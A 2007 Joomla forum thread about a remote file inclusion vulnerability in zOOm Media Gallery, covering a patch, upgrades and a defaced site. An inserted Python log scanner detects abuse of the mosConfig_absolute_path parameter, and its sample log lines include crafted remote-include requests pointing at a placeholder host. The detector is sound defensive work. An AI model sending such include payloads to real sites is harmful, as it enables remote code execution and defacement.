Zoom Media Gallery version 2.5.1 RC4 and prior
- brian
- Joomla! Master
- Posts: 12781
- Joined: Fri Aug 12, 2005 7:19 am
- Location: Leeds, UK
- Contact:
Zoom Media Gallery version 2.5.1 RC4 and prior
A vulnerability has been identified in zOOm Media Gallery, which could be exploited by remote attackers to execute arbitrary commands. This issue is due to an input validation error in the "lib/iptc/EXIF_Makernote.php" script that does not validate the "mosConfig_absolute_path" parameter, which could be exploited by remote attackers to include malicious PHP scripts and execute arbitrary commands with the privileges of the web server.
Source http://www.frsirt.com/english/advisories/2007/1353
"Exploited yesterday... Hacked tomorrow"
Blog http://brian.teeman.net/
Joomla Hidden Secrets http://hiddenjoomlasecrets.com/
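One way to check web server access logs for requests matching the advisory quoted above, as an added example that is not part of the original thread. It goes beyond the one script named in the advisory by flagging any request whose query string sets mosConfig_absolute_path, on the assumption that a client never legitimately supplies that server-side setting. The combined log format, the verdict names and the sample lines are assumptions constructed here.

```python
import re
from urllib.parse import parse_qsl, unquote, urlsplit

SCRIPT = "lib/iptc/exif_makernote.php"  # script named in the advisory (lowercased)
PARAM = "mosconfig_absolute_path"       # parameter named in the advisory (lowercased)
# Assumed input: Apache/nginx "combined" access-log lines.
LINE_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>[A-Z]+) (?P<target>\S+)[^"]*" (?P<status>\d{3})')
# A value that points off-host: scheme://... or protocol-relative //host
REMOTE_RE = re.compile(r'^\s*(?:[a-z][a-z0-9+.\-]*:)?//', re.I)


def classify(line):
    """Return a finding dict for a suspicious request, else None."""
    m = LINE_RE.match(line)
    if not m:
        return None
    parts = urlsplit(m["target"])
    path = unquote(parts.path).lower()
    for key, value in parse_qsl(parts.query, keep_blank_values=True):
        if key.lower() != PARAM:
            continue
        value = unquote(value)  # second decode catches double-encoded values
        on_script = path.endswith(SCRIPT)
        if on_script and REMOTE_RE.match(value):
            verdict = "remote-include-attempt"
        elif on_script:
            verdict = "path-override-attempt"
        else:
            verdict = "param-on-other-script"
        return {"ip": m["ip"], "time": m["ts"], "status": int(m["status"]),
                "path": path, "verdict": verdict}
    return None


def scan(lines):
    return [f for f in map(classify, lines) if f]


# Constructed sample log lines (documentation IP ranges, placeholder host).
SAMPLE = [
    '192.0.2.10 - - [28/Dec/2007:17:40:01 +0000] "GET /index.php?option=com_zoom&Itemid=5 HTTP/1.1" 200 5120 "-" "Mozilla/5.0"',
    '198.51.100.7 - - [28/Dec/2007:17:41:12 +0000] "GET /components/com_zoom/lib/iptc/EXIF_Makernote.php?mosConfig_absolute_path=http%3A%2F%2Fexample.invalid%2Fx.txt%3F HTTP/1.1" 200 812 "-" "-"',
    '198.51.100.7 - - [28/Dec/2007:17:41:30 +0000] "GET /components/com_zoom/lib/iptc/EXIF_Makernote.php?mosConfig_absolute_path=%2Fvar%2Ftmp%2F HTTP/1.1" 200 640 "-" "-"',
    '203.0.113.9 - - [28/Dec/2007:17:42:02 +0000] "GET /components/com_other/helper.php?mosConfig_absolute_path=ftp%253A%252F%252Fexample.invalid%252F HTTP/1.1" 404 210 "-" "-"',
]
if __name__ == "__main__":
    print(*scan(SAMPLE), sep="\n")
```

Access logs normally record only the query string, not POST bodies or cookies, so an empty result does not prove the script was never abused.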
- mikedeboer
- Joomla! Apprentice
- Posts: 7
- Joined: Sat Aug 20, 2005 3:59 pm
- Contact:
Re: Zoom Media Gallery version 2.5.1 RC4 and prior
I already knew about this vulnerability in ZMG, and I fixed it a while back too... It just hasn't been released yet - because I didn't have the time to do it!
To be honest, I don't have the time anymore to work on ZMG. I need some developers... and fast! You know anyone? :P
- brian
- Joomla! Master
- Posts: 12781
- Joined: Fri Aug 12, 2005 7:19 am
- Location: Leeds, UK
- Contact:
Re: Zoom Media Gallery version 2.5.1 RC4 and prior
Sorry Mike, not my strong point.
Maybe put a post asking for developers in another part of the forum.
"Exploited yesterday... Hacked tomorrow"
Blog http://brian.teeman.net/
Joomla Hidden Secrets http://hiddenjoomlasecrets.com/
-
- Joomla! Fledgling
- Posts: 2
- Joined: Mon Feb 26, 2007 7:13 am
Re: Zoom Media Gallery version 2.5.1 RC4 and prior
mikedeboer wrote:
> I already knew about this vulnerability in ZMG, and I fixed it a while back too... It just hasn't been released yet - because I didn't have the time to do it!
> To be honest, I don't have the time anymore to work on ZMG. I need some developers... and fast! You know anyone? :P
Hi Mike, where can I sign up?
- mikedeboer
- Joomla! Apprentice
- Posts: 7
- Joined: Sat Aug 20, 2005 3:59 pm
- Contact:
Re: Zoom Media Gallery version 2.5.1 RC4 and prior
Thanks Brian, I will.
ZZzzzz wrote:
> Hi Mike, where can I sign up?
If it's possible, could you send a short résumé (or something listing your experience) to 'mike AT zoomfactory DOT org'... or simply PM me.
-
- Joomla! Fledgling
- Posts: 2
- Joined: Mon Feb 26, 2007 7:13 am
Re: Zoom Media Gallery version 2.5.1 RC4 and prior
To fix the security please update the EXIF_Makernote.php and EXIF.php with the ones included in this attachment.
Put it in the /components/com_zoom/lib/iptc/
A new release will be available soon on the zoom factory website
http://www.zoomfactory.org
-
- Joomla! Apprentice
- Posts: 12
- Joined: Mon Dec 05, 2005 11:04 am
Re: Zoom Media Gallery version 2.5.1 RC4 and prior
brian wrote:
> which could be exploited by remote attackers to include malicious PHP scripts and execute arbitrary commands with the privileges of the web server.
I suppose that includes putting an .asp file containing facilities to examine your site files and deface it anytime (see attached screenshot)? Or should I be looking for something else here?
It worries me that once they put that file on your site, they can get your db details from configuration.php. You can imagine they can get whatever ftp account details are stored unprotected in any of the php files, for example in file safemode.php which is used by ZoomGallery component for allowing image uploading when/if safe mode is set to on, which many hosting providers still do today...
Any solution to protecting the db account details? How does Joomla address this, i.e. information in configuration.php being exposed? I know upgrading to the latest Joomla version and the latest versions of 3rd party add-ons is critical but there will always be security flaws to fix surely.
Regards,
A.Fraile
EDIT MOD: image doing publicity for hacker removed. No need to help the hackers.
Last edited by infograf768 on Wed May 30, 2007 7:23 am, edited 1 time in total.
-
- Joomla! Apprentice
- Posts: 44
- Joined: Thu Mar 30, 2006 10:55 am
Re: Zoom Media Gallery version 2.5.1 RC4 and prior
ZZzzzz wrote:
> To fix the security please update the EXIF_Makernote.php and EXIF.php with the ones included in this attachment.
> Put it in the /components/com_zoom/lib/iptc/ a new release will be available soon on the zoom factory website
> http://www.zoomfactory.org
Bit confused, but if I understand right from Zoom forum messages:
1. The hack will not work if register globals is set off in both php as well as globals.php?
2. If using rc4 or prior your patch should be applied? Is the patch applied in the latest Zoom download on the Zoom website? Why is the patch not available from the official Zoom website?
-
- Joomla! Fledgling
- Posts: 3
- Joined: Fri Dec 28, 2007 5:55 pm
Re: Zoom Media Gallery version 2.5.1 RC4 and prior
Hi!!
Need urgent help! My site has been defaced! A gif picture had been added to the ZMG main page between 2 of my galleries. How can I get rid of it?
-
- Joomla! Apprentice
- Posts: 44
- Joined: Thu Mar 30, 2006 10:55 am
Re: Zoom Media Gallery version 2.5.1 RC4 and prior
cadenza wrote:
> Hi!! need urgent help! my site has been defaced! a gif picture had been added to the ZMG main page between 2 of my galleries. How can I get rid of it?
Can we have some more information: which version are you using, did you apply the security patch posted by Mike, your security settings, globals etc.?
-
- Joomla! Fledgling
- Posts: 3
- Joined: Fri Dec 28, 2007 5:55 pm
Re: Zoom Media Gallery version 2.5.1 RC4 and prior
I am currently using ver 2.5.1 RC1. Nope, yet to apply the files. Pardon me to ask where to find the 2 update files mentioned earlier on in this thread?
Any idea how I can remove the inserted gif in between my photo galleries? Which file has been changed in ZMG directory? I know the file name of the inserted picture but do seem to be able to locate it in my server directories/files...
Thanks in advance!
-
- Joomla! Apprentice
- Posts: 44
- Joined: Thu Mar 30, 2006 10:55 am
Re: Zoom Media Gallery version 2.5.1 RC4 and prior
cadenza wrote:
> I am currently using ver 2.5.1 RC1. Nope, yet to apply the files. Pardon me to ask where to find the 2 update files mentioned earlier on in this thread? any idea how I can remove the inserted gif inbetween my photo galleries? which file has been changed in ZMG directory? I know the file name of the inserted picture but do seem to be able to locate it in my server directories/files...
There is a vulnerability [1] in all versions prior to 2.5.1 RC4. I would start by removing your current version, since it is hard to tell which files have been compromised, and load the latest version from the Zoom website [2]. For the patch posted in this thread you have to log in; the second message from ZZzzzz (April 16, 2007, 09:13:21 AM) contains the file.
[1] http://help.joomla.org/component/option ... temid,268/
[2] http://www.zoomfactory.org/index.php?op ... elect&id=1
-
- Joomla! Fledgling
- Posts: 3
- Joined: Fri Dec 28, 2007 5:55 pm
Re: Zoom Media Gallery version 2.5.1 RC4 and prior
Thanks! But is there a way to do it so that my existing galleries will remain? I.e. upgrade instead of a re-installation?